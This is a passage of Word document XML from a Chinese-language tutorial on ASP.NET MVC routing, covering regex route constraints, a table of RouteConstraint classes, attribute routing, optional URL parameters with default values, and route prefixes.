    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">controller = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"^H.*"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>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上述正则表达式形成了一个约束，它只匹配控制器以“H”打头的URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">action = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"^Index$|^About$"</w:t>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上述正则表达式形成了一个约束，它只匹配行为方法名称为“Index”或“About”的URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>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约束类型和值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">id = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> RangeRouteConstraint(10,20)</w:t>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上述限制了id的值在10-20之间，还有更多的约束类，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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16"/>
        <w:gridCol w:w="5300"/>
        <w:gridCol w:w="18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名称</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描述</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属性约束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AlphaRouteConstraint()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匹配字母字符，主要是(A-Z,a-z)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1866" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:spacing w:line="300" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>lpha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BoolRouteConstraint()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匹配一个可以解析成bool类型的值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1866" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:spacing w:line="300" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w: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DateTimeRouteConstraint()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匹配一个可以解析成DateTime类型的值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DecimalRouteConstraint()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匹配一个可以解析成Decimal类型的值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Decimal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DoubleRouteConstraint()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匹配一个可以解析成Double类型的值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FloatRouteConstraint()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匹配一个可以解析成Float类型的值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Float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IntRouteConstraint()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匹配一个可以解析成Int类型的值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LengthRouteConstraint(len)</w:t>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LengthRouteConstraint(min,max)</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匹配一个指定字符个数的值，或匹配字符个数在min和max之间的值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1866" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:spacing w:line="300" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ength(len)</w:t>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Length(min,max)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LongRouteConstraint()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匹配一个可以解析成Long类型的值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Long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MaxRouteConstraint(val)</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匹配一个小于val的值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1866" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:spacing w:line="300" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ax(val)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MaxLengthRouteConstraint(val)</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匹配一个字符长度小于val的值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MaxLength(val)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MinRouteConstraint(val)</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匹配一个大于val的值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Min(val)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MinLengthRouteConstraint(val)</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匹配一个字符长度大于val的值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MinLength(val)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RangeRouteConstraint(min,max)</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匹配一个值在min和max之间的值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1866" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:spacing w:line="300" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ange(min,max)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>我们可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CompoundRouteConstraint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>接收多个约束的组合。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>属性路由</w:t>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在属性路由中，路由是在控制器的类的C#属性定义的，但是属性路由扰乱了应用程序中控制器和路由配置两个部分，致使关注点合并在一起了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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要使用属性路由，我们首先要在RouteConfig类中的调用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>routes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MapMvcAttributeRoutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>可选URL参数和默认值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>你可以通过增加一个 "？" 标记到路由参数上去使用一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可选的URI参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。可以通过 parameter=value指定一个默认的值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Home/{Index?}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//访问Home或Home/Index</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Admin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Create/{name}/{age=18}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//访问Admin/Create/xc或Admin/Create/xc/18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>路由前缀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RoutePrefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>属性，为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>整个控制器设置一个共同的前缀</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
